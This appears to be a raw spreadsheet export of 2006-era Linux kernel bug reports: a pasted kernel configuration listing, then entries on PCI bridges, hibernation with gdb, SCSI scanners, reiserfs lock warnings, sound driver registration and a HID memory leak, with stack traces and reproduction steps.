not set # # IP: Netfilter Configuration # CONFIG_IP_NF_CONNTRACK=y CONFIG_IP_NF_CT_ACCT=y CONFIG_IP_NF_CONNTRACK_MARK=y # CONFIG_IP_NF_CONNTRACK_EVENTS is not set # CONFIG_IP_NF_CT_PROTO_SCTP is not set # CONFIG_IP_NF_FTP is not set # CONFIG_IP_NF_IRC is not set # CONFIG_IP_NF_NETBIOS_NS is not set # CONFIG_IP_NF_TFTP is not set # CONFIG_IP_NF_AMANDA is not set # CONFIG_IP_NF_PPTP is not set # CONFIG_IP_NF_H323 is not set # CONFIG_IP_NF_QUEUE is not set CONFIG_IP_NF_IPTABLES=y # CONFIG_IP_NF_MATCH_IPRANGE is not set # CONFIG_IP_NF_MATCH_TOS is not set # CONFIG_IP_NF_MATCH_RECENT is not set # CONFIG_IP_NF_MATCH_ECN is not set # CONFIG_IP_NF_MATCH_DSCP is not set # CONFIG_IP_NF_MATCH_AH is not set # CONFIG_IP_NF_MATCH_TTL is not set # CONFIG_IP_NF_MATCH_OWNER is not set # CONFIG_IP_NF_MATCH_ADDRTYPE is not set # CONFIG_IP_NF_MATCH_HASHLIMIT is not set CONFIG_IP_NF_FILTER=y CONFIG_IP_NF_TARGET_REJECT=y CONFIG_IP_NF_TARGET_LOG=y CONFIG_IP_NF_TARGET_ULOG=y # CONFIG_IP_NF_TARGET_TCPMSS is not set CONFIG_IP_NF_NAT=y CONFIG_IP_NF_NAT_NEEDED=y CONFIG_IP_NF_TARGET_MASQUERADE=y CONFIG_IP_NF_TARGET_REDIRECT=y # CONFIG_IP_NF_TARGET_NETMAP is not set # CONFIG_IP_NF_TARGET_SAME is not set # CONFIG_IP_NF_NAT_SNMP_BASIC is not set # CONFIG_IP_NF_MANGLE is not set CONFIG_IP_NF_RAW=y # CONFIG_IP_NF_ARPTABLES is not set # # DCCP Configuration (EXPERIMENTAL) # # CONFIG_IP_DCCP is not set # # SCTP Configuration (EXPERIMENTAL) # # CONFIG_IP_SCTP is not set # # TIPC Configuration (EXPERIMENTAL) # # CONFIG_TIPC is not set # CONFIG_ATM is not set # CONFIG_BRIDGE is not set # CONFIG_VLAN_8021Q is not set # CONFIG_DECNET is not set # CONFIG_LLC2 is not set # CONFIG_IPX is not set # CONFIG_ATALK is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set # CONFIG_HAMRADIO is not set # CONFIG_IRDA is not set # CONFIG_BT is not set # CONFIG_IEEE80211 is not set # # Device Drivers # # # Generic Driver Options # # CONFIG_STANDALONE is not set # CONFIG_PREVENT_FIRMWARE_BUILD is not set # CONFIG_FW_LOADER is not set # # Connector - unified userspace &lt;-&gt; kernelspace linker # # CONFIG_CONNECTOR is not set # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # # CONFIG_PARPORT is not set # # Plug and Play support # # # Block devices # CONFIG_BLK_DEV_FD=y # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set # CONFIG_BLK_DEV_COW_COMMON is not set CONFIG_BLK_DEV_LOOP=y # CONFIG_BLK_DEV_CRYPTOLOOP is not set # CONFIG_BLK_DEV_NBD is not set # CONFIG_BLK_DEV_SX8 is not set # CONFIG_BLK_DEV_RAM is not set # CONFIG_BLK_DEV_INITRD is not set # CONFIG_CDROM_PKTCDVD is not set # CONFIG_ATA_OVER_ETH is not set # # ATA/ATAPI/MFM/RLL support # CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_IDE_SATA is not set # CONFIG_BLK_DEV_HD_IDE is not set CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y CONFIG_BLK_DEV_IDECD=y # CONFIG_BLK_DEV_IDETAPE is not set # CONFIG_BLK_DEV_IDEFLOPPY is not set # CONFIG_IDE_TASK_IOCTL is not set # # IDE chipset support/bugfixes # CONFIG_IDE_GENERIC=y # CONFIG_BLK_DEV_CMD640 is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y # CONFIG_BLK_DEV_OFFBOARD is not set CONFIG_BLK_DEV_GENERIC=y # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_RZ1000 is not set CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_ATIIXP is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_CS5535 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set CONFIG_BLK_DEV_PIIX=y # CONFIG_BLK_DEV_IT821X is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set # CONFIG_IDE_ARM is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_IVB is not set CONFIG_IDEDMA_AUTO=y # CONFIG_BLK_DEV_HD is not set # # SCSI device support # # CONFIG_RAID_ATTRS is not set # CONFIG_SCSI is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # CONFIG_FUSION is not set # # IEEE 1394 (FireWire) support # # CONFIG_IEEE1394 is not set # # I2O device support # # CONFIG_I2O is not set # # Network device support # CONFIG_NETDEVICES=y # CONFIG_DUMMY is not set # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set # CONFIG_TUN is not set # # ARCnet devices # # CONFIG_ARCNET is not set # # PHY device support # # CONFIG_PHYLIB is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y CONFIG_MII=y # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set # CONFIG_CASSINI is not set CONFIG_NET_VENDOR_3COM=y CONFIG_VORTEX=m # CONFIG_TYPHOON is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_HP100 is not set # CONFIG_NET_PCI is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set CONFIG_E1000=m # CONFIG_E1000_NAPI is not set # CONFIG_E1000_DISABLE_PACKET_SPLIT is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SIS190 is not set # CONFIG_SKGE is not set # CONFIG_SKY2 is not set # CONFIG_SK98LIN is not set # CONFIG_TIGON3 is not set # CONFIG_BNX2 is not set # # Ethernet (10000 Mbit) # # CONFIG_CHELSIO_T1 is not set # CONFIG_IXGB is not set # CONFIG_S2IO is not set # # Token Ring devices # # CONFIG_TR is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Wan interfaces # # CONFIG_WAN is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PPP is not set # CONFIG_SLIP is not set # CONFIG_SHAPER is not set # CONFIG_NETCONSOLE is not set # CONFIG_NETPOLL is not set # CONFIG_NET_POLL_CONTROLLER is not set # # ISDN subsystem # # CONFIG_ISDN is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=800 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=600 # CONFIG_INPUT_JOYDEV is not set # CONFIG_INPUT_TSDEV is not set # CONFIG_INPUT_EVDEV is not set # CONFIG_INPUT_EVBUG is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_LKKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y # CONFIG_MOUSE_SERIAL is not set # CONFIG_MOUSE_VSXXXAA is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TOUCHSCREEN is not set # CONFIG_INPUT_MISC is not set # # Hardware I/O ports # CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_SERIO_SERPORT=y # CONFIG_SERIO_CT82C710 is not set CONFIG_SERIO_PCIPS2=y CONFIG_SERIO_LIBPS2=y # CONFIG_SERIO_RAW is not set # CONFIG_GAMEPORT is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # # CONFIG_SERIAL_8250 is not set # # Non-8250 serial port support # # CONFIG_SERIAL_JSM is not set CONFIG_UNIX98_PTYS=y CONFIG_LEGACY_PTYS=y CONFIG_LEGACY_PTY_COUNT=256 # # IPMI # # CONFIG_IPMI_HANDLER is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set # CONFIG_HW_RANDOM is not set # CONFIG_NVRAM is not set # CONFIG_RTC is not set # CONFIG_GEN_RTC is not set # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set # # Ftape, the floppy tape device driver # # CONFIG_AGP is not set # CONFIG_DRM is not set # CONFIG_MWAVE is not set # CONFIG_CS5535_GPIO is not set # CONFIG_RAW_DRIVER is not set # CONFIG_HANGCHECK_TIMER is not set # # TPM devices # # CONFIG_TCG_TPM is not set # CONFIG_TELCLOCK is not set # # I2C support # # CONFIG_I2C is not set # # SPI support # # CONFIG_SPI is not set # CONFIG_SPI_MASTER is not set # # Dallas's 1-wire bus # # CONFIG_W1 is not set # # Hardware Monitoring support # CONFIG_HWMON=y # CONFIG_HWMON_VID is not set # CONFIG_SENSORS_F71805F is not set # CONFIG_SENSORS_HDAPS is not set CONFIG_HWMON_DEBUG_CHIP=y # # Misc devices # # CONFIG_IBM_ASM is not set # # Multimedia devices # # CONFIG_VIDEO_DEV is not set CONFIG_VIDEO_V4L2=y # # Digital Video Broadcasting Devices # # CONFIG_DVB is not set # # Graphics support # # CONFIG_FB is not set CONFIG_VIDEO_SELECT=y # # Console display driver support # CONFIG_VGA_CONSOLE=y # CONFIG_VGACON_SOFT_SCROLLBACK is not set CONFIG_DUMMY_CONSOLE=y # # Sound # # CONFIG_SOUND is not set # # USB support # CONFIG_USB_ARCH_HAS_HCD=y CONFIG_USB_ARCH_HAS_OHCI=y CONFIG_USB_ARCH_HAS_EHCI=y # CONFIG_USB is not set # # NOTE: USB_STORAGE enables SCSI, and 'SCSI disk support' # # # USB Gadget Support # # CONFIG_USB_GADGET is not set # # MMC/SD Card support # # CONFIG_MMC is not set # # LED devices # # CONFIG_NEW_LEDS is not set # # LED drivers # # # LED Triggers # # # InfiniBand support # # CONFIG_INFINIBAND is not set # # EDAC - error detection and reporting (RAS) (EXPERIMENTAL) # # CONFIG_EDAC is not set # # Real Time Clock # # CONFIG_RTC_CLASS is not set # # File systems # CONFIG_EXT2_FS=y # CONFIG_EXT2_FS_XATTR is not set # CONFIG_EXT2_FS_XIP is not set CONFIG_EXT3_FS=y CONFIG_EXT3_FS_XATTR=y CONFIG_EXT3_FS_POSIX_ACL=y CONFIG_EXT3_FS_SECURITY=y CONFIG_JBD=y # CONFIG_JBD_DEBUG is not set CONFIG_FS_MBCACHE=y # CONFIG_REISERFS_FS is not set # CONFIG_JFS_FS is not set CONFIG_FS_POSIX_ACL=y # CONFIG_XFS_FS is not set # CONFIG_OCFS2_FS is not set # CONFIG_MINIX_FS is not set # CONFIG_ROMFS_FS is not set CONFIG_INOTIFY=y CONFIG_QUOTA=y CONFIG_QFMT_V1=y CONFIG_QFMT_V2=y CONFIG_QUOTACTL=y CONFIG_DNOTIFY=y CONFIG_AUTOFS_FS=y CONFIG_AUTOFS4_FS=y # CONFIG_FUSE_FS is not set # # CD-ROM/DVD Filesystems # CONFIG_ISO9660_FS=y # CONFIG_JOLIET is not set # CONFIG_ZISOFS is not set # CONFIG_UDF_FS is not set # # DOS/FAT/NT Filesystems # # CONFIG_MSDOS_FS is not set # CONFIG_VFAT_FS is not set # CONFIG_NTFS_FS is not set # # Pseudo filesystems # CONFIG_PROC_FS=y CONFIG_PROC_KCORE=y CONFIG_SYSFS=y CONFIG_TMPFS=y # CONFIG_HUGETLBFS is not set # CONFIG_HUGETLB_PAGE is not set CONFIG_RAMFS=y # CONFIG_CONFIGFS_FS is not set # # Miscellaneous filesystems # # CONFIG_ADFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_HFS_FS is not set # CONFIG_HFSPLUS_FS is not set # CONFIG_BEFS_FS is not set # CONFIG_BFS_FS is not set # CONFIG_EFS_FS is not set # CONFIG_CRAMFS is not set # CONFIG_VXFS_FS is not set # CONFIG_HPFS_FS is not set # CONFIG_QNX4FS_FS is not set # CONFIG_SYSV_FS is not set # CONFIG_UFS_FS is not set # # Network File Systems # # CONFIG_NFS_FS is not set # CONFIG_NFSD is not set # CONFIG_SMB_FS is not set # CONFIG_CIFS is not set # CONFIG_NCP_FS is not set # CONFIG_CODA_FS is not set # CONFIG_AFS_FS is not set # CONFIG_9P_FS is not set # # Partition Types # # CONFIG_PARTITION_ADVANCED is not set CONFIG_MSDOS_PARTITION=y # # Native Language Support # CONFIG_NLS=y CONFIG_NLS_DEFAULT="iso8859-1" CONFIG_NLS_CODEPAGE_437=m CONFIG_NLS_CODEPAGE_737=m CONFIG_NLS_CODEPAGE_775=m CONFIG_NLS_CODEPAGE_850=m CONFIG_NLS_CODEPAGE_852=m CONFIG_NLS_CODEPAGE_855=m CONFIG_NLS_CODEPAGE_857=m CONFIG_NLS_CODEPAGE_860=m CONFIG_NLS_CODEPAGE_861=m CONFIG_NLS_CODEPAGE_862=m CONFIG_NLS_CODEPAGE_863=m CONFIG_NLS_CODEPAGE_864=m CONFIG_NLS_CODEPAGE_865=m CONFIG_NLS_CODEPAGE_866=m CONFIG_NLS_CODEPAGE_869=m CONFIG_NLS_CODEPAGE_936=m CONFIG_NLS_CODEPAGE_950=m CONFIG_NLS_CODEPAGE_932=m CONFIG_NLS_CODEPAGE_949=m CONFIG_NLS_CODEPAGE_874=m CONFIG_NLS_ISO8859_8=m CONFIG_NLS_CODEPAGE_1250=m CONFIG_NLS_CODEPAGE_1251=m CONFIG_NLS_ASCII=m CONFIG_NLS_ISO8859_1=m CONFIG_NLS_ISO8859_2=m CONFIG_NLS_ISO8859_3=m CONFIG_NLS_ISO8859_4=m CONFIG_NLS_ISO8859_5=m CONFIG_NLS_ISO8859_6=m CONFIG_NLS_ISO8859_7=m CONFIG_NLS_ISO8859_9=m CONFIG_NLS_ISO8859_13=m CONFIG_NLS_ISO8859_14=m CONFIG_NLS_ISO8859_15=m CONFIG_NLS_KOI8_R=m CONFIG_NLS_KOI8_U=m CONFIG_NLS_UTF8=m # # Instrumentation Support # # CONFIG_PROFILING is not set # CONFIG_KPROBES is not set # # Kernel hacking # # CONFIG_PRINTK_TIME is not set # CONFIG_MAGIC_SYSRQ is not set # CONFIG_DEBUG_KERNEL is not set CONFIG_LOG_BUF_SHIFT=15 CONFIG_DEBUG_BUGVERBOSE=y CONFIG_DEBUG_FS=y # CONFIG_UNWIND_INFO is not set CONFIG_EARLY_PRINTK=y CONFIG_STACK_BACKTRACE_COLS=2 CONFIG_X86_FIND_SMP_CONFIG=y CONFIG_X86_MPPARSE=y CONFIG_DOUBLEFAULT=y # # Security options # # CONFIG_KEYS is not set # CONFIG_SECURITY is not set # # Cryptographic options # CONFIG_CRYPTO=y CONFIG_CRYPTO_HMAC=y CONFIG_CRYPTO_NULL=y CONFIG_CRYPTO_MD4=y CONFIG_CRYPTO_MD5=y CONFIG_CRYPTO_SHA1=y CONFIG_CRYPTO_SHA256=y CONFIG_CRYPTO_SHA512=y CONFIG_CRYPTO_WP512=y CONFIG_CRYPTO_TGR192=y CONFIG_CRYPTO_DES=y CONFIG_CRYPTO_BLOWFISH=y CONFIG_CRYPTO_TWOFISH=y CONFIG_CRYPTO_SERPENT=y CONFIG_CRYPTO_AES=y CONFIG_CRYPTO_AES_586=y CONFIG_CRYPTO_CAST5=y CONFIG_CRYPTO_CAST6=y CONFIG_CRYPTO_TEA=y CONFIG_CRYPTO_ARC4=y CONFIG_CRYPTO_KHAZAD=y CONFIG_CRYPTO_ANUBIS=y CONFIG_CRYPTO_DEFLATE=y CONFIG_CRYPTO_MICHAEL_MIC=y CONFIG_CRYPTO_CRC32C=y CONFIG_CRYPTO_TEST=y # # Hardware crypto devices # # CONFIG_CRYPTO_DEV_PADLOCK is not set # # Library routines # # CONFIG_CRC_CCITT is not set # CONFIG_CRC16 is not set # CONFIG_CRC32 is not set CONFIG_LIBCRC32C=y CONFIG_ZLIB_INFLATE=y CONFIG_ZLIB_DEFLATE=y CONFIG_TEXTSEARCH=y CONFIG_TEXTSEARCH_KMP=y CONFIG_TEXTSEARCH_BM=y CONFIG_TEXTSEARCH_FSM=y CONFIG_GENERIC_HARDIRQS=y CONFIG_GENERIC_IRQ_PROBE=y CONFIG_GENERIC_PENDING_IRQ=y CONFIG_X86_SMP=y CONFIG_X86_HT=y CONFIG_X86_BIOS_REBOOT=y CONFIG_X86_TRAMPOLINE=y CONFIG_KTIME_SCALAR=y on the server running squid-2.5stable14 witsh wccp2 patch That this trace mean? can it make me any problems?</t>
  </si>
  <si>
    <t>CompaqPresarioV2417LA: Bus #06 (-#09) is hidden behind transparent bridge #05 (-#05)</t>
  </si>
  <si>
    <t>2006-11-15 06:25 UTC</t>
  </si>
  <si>
    <t>2007-10-24 07:29 UTC</t>
  </si>
  <si>
    <t>6783 7575 7831 8480 8748 8772 8899 8903 9049</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Ubuntu Edgy Hardware Environment: https://wiki.ubuntu.com/LaptopTestingTeam/CompaqPresarioV2417LA/Hardware Software Environment: Default + updates + automatix2 Problem Description: Message in log [17179573.656000] Please report the result to linux-kernel to fix this permanently [17179573.656000] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] [17179573.660000] ACPI: PCI Interrupt Link [LNKA] (IRQs 10 11) *0, disabled. [17179573.660000] ACPI: PCI Interrupt Link [LNKB] (IRQs 10 11) *0, disabled. [17179573.660000] ACPI: PCI Interrupt Link [LNKC] (IRQs 10 11) *0, disabled. [17179573.660000] ACPI: PCI Interrupt Link [LNKD] (IRQs 10 11) *0, disabled. [17179573.660000] ACPI: PCI Interrupt Link [LNKE] (IRQs 10 11) *0, disabled. [17179573.660000] ACPI: PCI Interrupt Link [LNKF] (IRQs 10 11) *0, disabled. [17179573.660000] ACPI: PCI Interrupt Link [LNKG] (IRQs 10 11) *0, disabled. [17179573.660000] ACPI: PCI Interrupt Link [LNKH] (IRQs 10 11) *0, disabled. [17179573.660000] ACPI: Embedded Controller [EC0] (gpe 24) interrupt mode. [17179573.664000] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P2P_._PRT] [17179573.664000] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.AGP_._PRT] [17179573.664000] Linux Plug and Play Support v0.97 (c) Adam Belay Steps to reproduce:</t>
  </si>
  <si>
    <t>suspend to disk fails if gdb is suspended with a traced child</t>
  </si>
  <si>
    <t>2.6.19-rc6</t>
  </si>
  <si>
    <t>2006-11-15 23:32 UTC</t>
  </si>
  <si>
    <t>maurice barnum</t>
  </si>
  <si>
    <t>2007-02-07 04:30 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: unknown. occurs in 2.6.17, 2.6.18, and 2.6.19-sw2 Distribution: fedora core 5 Hardware Environment: thinkpad x32 Problem Description: suspend-to-disk is unable to freeze processes if a gdb with a traced child is suspended (SIGTSTP). Steps to reproduce: 1)gdb /bin/cat 2) ^Z 3) ^Z 4) pm-hibernate config and dmesg output attached.</t>
  </si>
  <si>
    <t>SCSI AEC6712D Card (Artop Electronic Corp - old name=ACARD) memory crash in xsane</t>
  </si>
  <si>
    <t>2.6.17-10-386</t>
  </si>
  <si>
    <t>2006-11-16 08:20 UTC</t>
  </si>
  <si>
    <t>Fabien JA</t>
  </si>
  <si>
    <t>2007-09-03 19:55 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.16 Distribution: Ubuntu Edgy (bug also reported in Gentoo with same 2.6.17 kernel) Hardware Environment: SCSI AEC6712D Card (PCI device) on a standard NVIDIA motherBOARD (Nforce2 chipset) Software Environment: "lib-sane" and "sane-utils" 1.0.18-3 / bug exists with other software like "scanimage" 1.0.18 Problem Description: When I want to acquire a preview or a direct scan, the programms says "failed to start scanner : out of memory". In command line, there is the same error : "out of memory" This bug has never happend with an other Ubuntu distribution. Apparently, all the previous versions of the kernel fix the bug... Steps to reproduce: have a "ACARD AEC6712D PCI" card and a SCSI scanner and a 2.6.17 kernel. Try to scan</t>
  </si>
  <si>
    <t>Possible recursive locking</t>
  </si>
  <si>
    <t>2.6.19-rc3-g858cbcdd</t>
  </si>
  <si>
    <t>2006-11-16 10:26 UTC</t>
  </si>
  <si>
    <t>Carlos Mart</t>
  </si>
  <si>
    <t>2008-12-05 11:12 UTC</t>
  </si>
  <si>
    <t>Edward Shishkin</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: I've only run this on this kernel. Distribution: Debian unstable Hardware Environment: AMD Athlon64X2 in 64-bit mode. Software Environment: beagle_0.2.12-1+b1 Problem Description: Beagle segfaults every time and the kernel printed a warning a bout a possible recursive locking. Steps to reproduce: Run beagle and wait for it to happen. Backtrace: ============================================= [ INFO: possible recursive locking detected ] 2.6.19-rc3-g858cbcdd #5 --------------------------------------------- beagled/4873 is trying to acquire lock: (&amp;inode-&gt;i_mutex){--..}, at: [&lt;ffffffff80262006&gt;] mutex_lock+0x25/0x2a but task is already holding lock: (&amp;inode-&gt;i_mutex){--..}, at: [&lt;ffffffff80262006&gt;] mutex_lock+0x25/0x2a other info that might help us debug this: 3 locks held by beagled/4873: #0: (&amp;inode-&gt;i_mutex){--..}, at: [&lt;ffffffff80262006&gt;] mutex_lock+0x25/0x2a #1: (&amp;REISERFS_I(inode)-&gt;xattr_sem){----}, at: [&lt;ffffffff8030ad10&gt;] reiserfs_setxattr+0x6b/0x132 #2: (&amp;REISERFS_SB(s)-&gt;xattr_dir_sem){----}, at: [&lt;ffffffff8030ad37&gt;] reiserfs_setxattr+0x92/0x132 stack backtrace: Call Trace: [&lt;ffffffff80296d35&gt;] __lock_acquire+0x146/0x9e2 [&lt;ffffffff80262006&gt;] mutex_lock+0x25/0x2a [&lt;ffffffff8029764d&gt;] lock_acquire+0x7c/0xa0 [&lt;ffffffff80262006&gt;] mutex_lock+0x25/0x2a [&lt;ffffffff80261e36&gt;] __mutex_lock_slowpath+0xdd/0x288 [&lt;ffffffff80262006&gt;] mutex_lock+0x25/0x2a [&lt;ffffffff8030b2b9&gt;] reiserfs_xattr_set+0x125/0x3b3 [&lt;ffffffff80263993&gt;] _spin_unlock_irq+0x36/0x53 [&lt;ffffffff80262c7a&gt;] __down_write_nested+0x3d/0xab [&lt;ffffffff8030ad37&gt;] reiserfs_setxattr+0x92/0x132 [&lt;ffffffff8030b61e&gt;] user_set+0x4f/0x55 [&lt;ffffffff8030ad4d&gt;] reiserfs_setxattr+0xa8/0x132 [&lt;ffffffff802c56ee&gt;] vfs_setxattr+0x9a/0xfe [&lt;ffffffff802c5829&gt;] setxattr+0xd7/0xf6 [&lt;ffffffff8029688a&gt;] trace_hardirqs_on+0xff/0x12a [&lt;ffffffff802075f0&gt;] kmem_cache_free+0x1bd/0x1cf [&lt;ffffffff8029688a&gt;] trace_hardirqs_on+0xff/0x12a [&lt;ffffffff80223697&gt;] __user_walk_fd+0x53/0x62 [&lt;ffffffff802c5902&gt;] sys_lsetxattr+0x58/0x7b [&lt;ffffffff80260bc9&gt;] thread_return+0xe5/0x119 [&lt;ffffffff80262ebd&gt;] trace_hardirqs_on_thunk+0x35/0x37 [&lt;ffffffff8029688a&gt;] trace_hardirqs_on+0xff/0x12a [&lt;ffffffff80262ebd&gt;] trace_hardirqs_on_thunk+0x35/0x37 [&lt;ffffffff8025d11e&gt;] system_call+0x7e/0x83</t>
  </si>
  <si>
    <t>kobject_add failed for card0 with -EEXIST, don't try to register things with the same name in the same directory.</t>
  </si>
  <si>
    <t>2.6.19-rc5-mm2</t>
  </si>
  <si>
    <t>2006-11-16 14:55 UTC</t>
  </si>
  <si>
    <t>2006-11-25 05:03 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: N/A, new driver Distribution: Fedora Code Devel Hardware Environment: E-MU 1820m sound system Problem Description: ohci1394: fw-host0: OHCI-1394 1.1 (PCI): IRQ=[17] MMIO=[ea005000-ea0057ff] Max Packet=[2048] IR/IT contexts=[4/8] kobject_add failed for card0 with -EEXIST, don't try to register things with the same name in the same directory. Call Trace: [&lt;ffffffff802614eb&gt;] show_trace+0x34/0x47 [&lt;ffffffff80261510&gt;] dump_stack+0x12/0x17 [&lt;ffffffff8031ac08&gt;] kobject_add+0x163/0x18e [&lt;ffffffff80373559&gt;] device_add+0x84/0x498 [&lt;ffffffff80373a3f&gt;] device_create+0xc0/0xef [&lt;ffffffff8812caff&gt;] :snd:snd_card_register+0x33/0x2a7 [&lt;ffffffff882cf285&gt;] :snd_emux_synth:snd_emux_init_hwdep+0xaa/0xb7 [&lt;ffffffff882cd1ac&gt;] :snd_emux_synth:snd_emux_register+0xe7/0x13f [&lt;ffffffff882dc162&gt;] :snd_emu10k1_synth:snd_emu10k1_synth_new_device+0x10c/0x16a [&lt;ffffffff881660db&gt;] :snd_seq_device:init_device+0x47/0x76 [&lt;ffffffff881667b7&gt;] :snd_seq_device:snd_seq_device_register_driver+0xc5/0x116 [&lt;ffffffff8029232b&gt;] sys_init_module+0x1733/0x18b2 [&lt;ffffffff8025511e&gt;] system_call+0x7e/0x83 DWARF2 unwinder stuck at system_call+0x7e/0x83 Leftover inexact backtrace: Steps to reproduce: Boot</t>
  </si>
  <si>
    <t>drivers_ieee1394</t>
  </si>
  <si>
    <t>Memory leak in hid_parse_report</t>
  </si>
  <si>
    <t>2006-11-19 08:43 UTC</t>
  </si>
  <si>
    <t>Catalin Marinas</t>
  </si>
  <si>
    <t>2007-08-09 06:00 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: probably before 2.6.12 Distribution: Ubuntu 6.06 Hardware Environment: Fujitsu-Siemens laptop, USB mouse Software Environment: X, Gnome Problem Description: Leaked hid_collection object allocated in hid_parse_report. The object allocation backtrace reported by kmemleak is: unreferenced object 0xdd2259fc (size 192): [&lt;c019727b&gt;] __kmalloc_track_caller [&lt;c01809a5&gt;] __kzalloc [&lt;e02dfb46&gt;] hid_parse_report [&lt;e02e1b95&gt;] usb_hid_configure [&lt;e02e2174&gt;] hid_probe [&lt;e0053ccf&gt;] usb_probe_interface [&lt;c02c05ba&gt;] really_probe [&lt;ffffffff&gt;] This is actually the device-&gt;collection pointer assigned in hid_parse_report() but not freed when the device is disconnected. My attempt to free dev-&gt;collection in hid_free_device() didn't solve the issue. I suspect that a dev-&gt;collection kfree is missing on the hiddev_disconnect() path but I am not familiar with this code to provide a proper fix. Steps to reproduce: The bug can be reproduced by connecting and disconnecting a USB mouse. The latest kmemleak patch needs to be applied (http://homepage.ntlworld.com/cmarinas/kmemleak/patch-2.6.19-rc1-kmemleak-0.11.bz2), CONFIG_DEBUG_MEMLEAK enabled and debugfs mounted on /sys/kernel/debug/. Reading the /sys/kernel/debug/memleak file will show the backtrace of the unreferenced objects.</t>
  </si>
  <si>
    <t>oops after insmod rfcomm and rmmod rfcomm</t>
  </si>
  <si>
    <t>2006-11-19 16:46 UTC</t>
  </si>
  <si>
    <t>Pavol Gono</t>
  </si>
  <si>
    <t>2008-09-22 12:39 UTC</t>
  </si>
  <si>
